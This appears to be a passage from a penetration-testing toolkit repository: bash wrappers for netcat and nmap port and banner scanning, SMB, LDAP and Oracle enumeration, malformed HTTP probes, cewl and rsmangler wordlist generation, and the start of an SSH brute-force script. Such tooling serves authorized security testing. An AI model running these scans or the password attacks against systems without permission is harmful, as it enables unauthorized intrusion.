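24 | # Usage: tcp-ports-scan-nc.sh <ip> <port-range>
25 | # netcat connect scan: -z sends no data, -n disables DNS lookups (so the
26 | # target must be numeric), -v prints the result for each port.
27 | # Wrong argument count: message on stderr, exit status 1.
28 | if [[ $# -eq 2 ]]; then
29 |   nc -z -n -v "$1" "$2"
30 | else
31 |   echo "Please provide a host and a port range." >&2
32 |   exit 1
33 | fi
34 |
--------------------------------------------------------------------------------
/smb/scan-nbtscan.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.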
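13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 | # Usage: scan-nbtscan.sh <host|range>
25 | # Runs nbtscan on the target and copies stdout+stderr to nbtscan_<target>.txt.
26 | # The report name is derived from the argument, so any '/' (e.g. in a CIDR
27 | # range) is replaced with '_' to keep it a single file in the current directory.
28 | # Wrong argument count: message on stderr, exit status 1.
29 | if [[ $# -eq 1 ]]; then
30 |   report="nbtscan_${1//\//_}.txt"
31 |   nbtscan -rvh "$1" 2>&1 | tee "$report"
32 | else
33 |   echo "Please provide the target host." >&2
34 |   exit 1
35 | fi
36 |
--------------------------------------------------------------------------------
/web/robots-ssl.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 | # Usage: robots-ssl.sh <host>
25 | # Downloads https://<host>/robots.txt into the current directory.
26 | # --no-check-certificate turns TLS certificate validation off, so the file
27 | # is not authenticated; treat its contents as untrusted input.
28 | # Wrong argument count: message on stderr, exit status 1.
29 | if [[ $# -eq 1 ]]; then
30 |   wget "https://$1/robots.txt" --no-check-certificate
31 | else
32 |   echo "Please provide target host." >&2
33 |   exit 1
34 | fi
35 |
--------------------------------------------------------------------------------
/web/banner-grabbing-curl-http.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 | # Usage: banner-grabbing-curl-http.sh <url>
25 | # Sends a HEAD request and prints the response headers.
26 | # --insecure skips TLS certificate validation, so the headers may come from
27 | # any endpoint able to intercept the connection.
28 | # Wrong argument count: message on stderr, exit status 1.
29 | if [[ $# -eq 1 ]]; then
30 |   curl -s -I -i -X HEAD --insecure "$1"
31 | else
32 |   echo "Please provide a target host." >&2
33 |   exit 1
34 | fi
35 |
--------------------------------------------------------------------------------
/web/web-headers-null.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.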
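13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 | # Usage: web-headers-null.sh <ip> <port>
25 | # Sends the request line 'GET /%00' (no HTTP version) with netcat and
26 | # prints whatever the server answers.
27 | # Wrong argument count: message on stderr, exit status 1.
28 | if [[ $# -eq 2 ]]; then
29 |   echo -e 'GET /%00\r\n\r\n' | nc "$1" "$2"
30 | else
31 |   echo "Please provide the target IP and port." >&2
32 |   exit 1
33 | fi
34 |
--------------------------------------------------------------------------------
/cracking/generate-wordlist.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 | # Usage: generate-wordlist.sh <wordfile>
25 | # Feeds <wordfile> to rsmangler on stdin and writes the result to
26 | # <wordfile>_passwordlist.txt, next to the input file.
27 | # The path is quoted and redirected directly instead of going through cat.
28 | # Wrong argument count: message on stderr, exit status 1.
29 | if [[ $# -eq 1 ]]; then
30 |   rsmangler --file - < "$1" > "${1}_passwordlist.txt"
31 | else
32 |   echo "Please provide a list of words." >&2
33 |   exit 1
34 | fi
35 |
--------------------------------------------------------------------------------
/oracle/odat-ping.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 | # Usage: odat-ping.sh <host> <port>
25 | # Runs ODAT's tnscmd module with --ping against the listener.
26 | # odat.py is resolved relative to the current directory.
27 | # Wrong argument count: message on stderr, exit status 1.
28 | if [[ $# -eq 2 ]]; then
29 |   python3 odat.py tnscmd -s "$1" -p "$2" --ping
30 | else
31 |   echo "Please provide the target host and port." >&2
32 |   exit 1
33 | fi
34 |
--------------------------------------------------------------------------------
/oracle/odat-sidguesser.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.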
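13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 | # Usage: odat-sidguesser.sh <host> <port>
25 | # Runs ODAT's sidguesser module against the listener.
26 | # odat.py is resolved relative to the current directory.
27 | # Wrong argument count: message on stderr, exit status 1.
28 | if [[ $# -eq 2 ]]; then
29 |   python3 odat.py sidguesser -s "$1" -p "$2"
30 | else
31 |   echo "Please provide the target host and port." >&2
32 |   exit 1
33 | fi
34 |
--------------------------------------------------------------------------------
/port-scanning/tcp/tcp-ports-scan-delay-nc.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 | # Usage: tcp-ports-scan-delay-nc.sh <host> <port-range>
25 | # netcat connect scan with a 1-second timeout per connection (-w 1);
26 | # -z sends no data and -v prints the result for each port.
27 | # Wrong argument count: message on stderr, exit status 1.
28 | if [[ $# -eq 2 ]]; then
29 |   nc -w 1 -z -v "$1" "$2"
30 | else
31 |   echo "Please provide a host and a port range." >&2
32 |   exit 1
33 | fi
34 |
--------------------------------------------------------------------------------
/smb/scan-smbclient.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 | # Usage: scan-smbclient.sh <ip>
25 | # Requests the share list without a password (-N) and copies stdout+stderr
26 | # to smbclient_<ip>.txt. A listing that succeeds indicates the server
27 | # accepts anonymous sessions.
28 | # Wrong argument count: message on stderr, exit status 1.
29 | if [[ $# -eq 1 ]]; then
30 |   smbclient -L\\ -N -I "$1" 2>&1 | tee "smbclient_$1.txt"
31 | else
32 |   echo "Please provide the target host." >&2
33 |   exit 1
34 | fi
35 |
--------------------------------------------------------------------------------
/oracle/odat-status.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.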
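13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 | # Usage: odat-status.sh <host> <port>
25 | # Runs ODAT's tnscmd module with --status against the listener.
26 | # odat.py is resolved relative to the current directory.
27 | # Wrong argument count: message on stderr, exit status 1.
28 | if [[ $# -eq 2 ]]; then
29 |   python3 odat.py tnscmd -s "$1" -p "$2" --status
30 | else
31 |   echo "Please provide the target host and port." >&2
32 |   exit 1
33 | fi
34 |
--------------------------------------------------------------------------------
/oracle/odat-version.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 | # Usage: odat-version.sh <host> <port>
25 | # Runs ODAT's tnscmd module with --version against the listener.
26 | # odat.py is resolved relative to the current directory.
27 | # Wrong argument count: message on stderr, exit status 1.
28 | if [[ $# -eq 2 ]]; then
29 |   python3 odat.py tnscmd -s "$1" -p "$2" --version
30 | else
31 |   echo "Please provide the target host and port." >&2
32 |   exit 1
33 | fi
34 |
--------------------------------------------------------------------------------
/web/screenshot.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 | # Usage: screenshot.sh <url-file>
25 | # Runs EyeWitness (python2, expected under /opt/EyeWitness) in --web mode
26 | # on the URLs listed in <url-file>. The path is quoted so a file name with
27 | # spaces is passed as one argument.
28 | # Wrong argument count: message on stderr, exit status 1.
29 | if [[ $# -eq 1 ]]; then
30 |   python2 /opt/EyeWitness/EyeWitness.py --web -f "$1"
31 | else
32 |   echo "Please provide a file containing target urls." >&2
33 |   exit 1
34 | fi
35 |
--------------------------------------------------------------------------------
/web/web-headers-malformed-2.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.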
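13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 | # Usage: web-headers-malformed-2.sh <ip> <port>
25 | # Sends 'GET / JUNK/1.0' (an invalid protocol token) with netcat and
26 | # prints whatever the server answers.
27 | # Wrong argument count: message on stderr, exit status 1.
28 | if [[ $# -eq 2 ]]; then
29 |   echo -e 'GET / JUNK/1.0\r\n\r\n' | nc "$1" "$2"
30 | else
31 |   echo "Please provide the target IP and port." >&2
32 |   exit 1
33 | fi
34 |
--------------------------------------------------------------------------------
/web/web-headers-malformed.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 | # Usage: web-headers-malformed.sh <ip> <port>
25 | # Sends 'GET / HTTP/3.0' as a plain-text request line with netcat and
26 | # prints whatever the server answers.
27 | # Wrong argument count: message on stderr, exit status 1.
28 | if [[ $# -eq 2 ]]; then
29 |   echo -e 'GET / HTTP/3.0\r\n\r\n' | nc "$1" "$2"
30 | else
31 |   echo "Please provide the target IP and port." >&2
32 |   exit 1
33 | fi
34 |
--------------------------------------------------------------------------------
/cracking/generate-wordlist-from-site.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 | # Usage: generate-wordlist-from-site.sh <site> <min-word-length>
25 | # Runs cewl on <site> and writes words of at least <min-word-length>
26 | # characters to <site>-wordlist.txt. The output name is derived from the
27 | # first argument, so any '/' (e.g. in 'http://...') is replaced with '_'
28 | # to keep it a single file in the current directory.
29 | # Wrong argument count: message on stderr, exit status 1.
30 | if [[ $# -eq 2 ]]; then
31 |   cewl "$1" -m "$2" -w "${1//\//_}-wordlist.txt"
32 | else
33 |   echo "Please provide a website and a password length." >&2
34 |   exit 1
35 | fi
36 |
--------------------------------------------------------------------------------
/ldap/scan-enum4linux.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.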
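13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 | # Usage: scan-enum4linux.sh <host>
25 | # Runs enum4linux against <host> and copies stdout+stderr to
26 | # enum4linux_<host>.txt in the current directory.
27 | # Wrong argument count: message on stderr, exit status 1.
28 | if [[ $# -eq 1 ]]; then
29 |   enum4linux -a -v -M -l -d "$1" 2>&1 | tee "enum4linux_$1.txt"
30 | else
31 |   echo "Please provide the target host." >&2
32 |   exit 1
33 | fi
34 |
--------------------------------------------------------------------------------
/smb/scan-enum4linux.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 | # Usage: scan-enum4linux.sh <host>
25 | # Runs enum4linux against <host> and copies stdout+stderr to
26 | # enum4linux_<host>.txt in the current directory.
27 | # Wrong argument count: message on stderr, exit status 1.
28 | if [[ $# -eq 1 ]]; then
29 |   enum4linux -a -v -M -l -d "$1" 2>&1 | tee "enum4linux_$1.txt"
30 | else
31 |   echo "Please provide the target host." >&2
32 |   exit 1
33 | fi
34 |
--------------------------------------------------------------------------------
/web/banner-grabbing-nc-http.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 | # Usage: banner-grabbing-nc-http.sh <host> <port>
25 | # Sends 'HEAD / HTTP/1.0' with netcat and prints the response headers.
26 | # The connection is plain TCP, so this does not work against TLS ports.
27 | # Wrong argument count: message on stderr, exit status 1.
28 | if [[ $# -eq 2 ]]; then
29 |   echo -e 'HEAD / HTTP/1.0\r\n\r\n' | nc "$1" "$2"
30 | else
31 |   echo "Please provide the target host and port." >&2
32 |   exit 1
33 | fi
34 |
--------------------------------------------------------------------------------
/oracle/scanner.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.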
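13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 | # Usage: scanner.sh <host> <port>
25 | # Runs oscanner against the listener and copies stdout+stderr to
26 | # oracle_scanner_<host>_<port>.txt in the current directory.
27 | # Wrong argument count: message on stderr, exit status 1.
28 | if [[ $# -eq 2 ]]; then
29 |   oscanner -v -s "$1" -P "$2" 2>&1 | tee "oracle_scanner_$1_$2.txt"
30 | else
31 |   echo "Please provide the target host and port." >&2
32 |   exit 1
33 | fi
34 |
--------------------------------------------------------------------------------
/reconnaissance/shodan/shodanhat/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2017 HatBashBR
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.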
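IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/web/banner-grabbing-nmap-script.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2020 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 | # Usage: banner-grabbing-nmap-script.sh <host> <ports>
25 | # nmap version detection (-sV) plus the 'banner' NSE script on <ports>.
26 | # Wrong argument count: message on stderr, exit status 1.
27 | if [[ $# -eq 2 ]]; then
28 |   nmap -sV --script=banner "$1" -p"$2"
29 | else
30 |   echo "Please provide a target host and a list of ports." >&2
31 |   exit 1
32 | fi
33 |
--------------------------------------------------------------------------------
/web/curl-options.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.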
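8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .
21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 |
25 | # e.g. $1 == target url
26 | #
27 | # Usage: curl-options.sh <url>
28 | # Sends an OPTIONS request (-X OPTIONS) and prints the response headers,
29 | # which is where a server lists the methods it allows.
30 | # --insecure skips TLS certificate validation, so the answer may come from
31 | # any endpoint able to intercept the connection.
32 | # Wrong argument count: message on stderr, exit status 1.
33 |
34 | if [[ $# -eq 1 ]]; then
35 |   curl -i -I -X OPTIONS --insecure "$1"
36 | else
37 |   echo "Please provide a target host." >&2
38 |   exit 1
39 | fi
40 |
--------------------------------------------------------------------------------
/cracking/ssh-bf.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # This file is part of PenTestKit
4 | # Copyright (C) 2017-2018 @maldevel
5 | # https://github.com/maldevel/PenTestKit
6 | #
7 | # PenTestKit - Useful tools for Penetration Testing.
8 | #
9 | # This program is free software: you can redistribute it and/or modify
10 | # it under the terms of the GNU General Public License as published by
11 | # the Free Software Foundation, either version 3 of the License, or
12 | # (at your option) any later version.
13 | #
14 | # This program is distributed in the hope that it will be useful,
15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
17 | # GNU General Public License for more details.
18 | #
19 | # You should have received a copy of the GNU General Public License
20 | # along with this program. If not, see .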
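21 | #
22 | # For more see the file 'LICENSE' for copying permission.
23 |
24 | # Usage: ssh-bf.sh <host> <user> <password-file>
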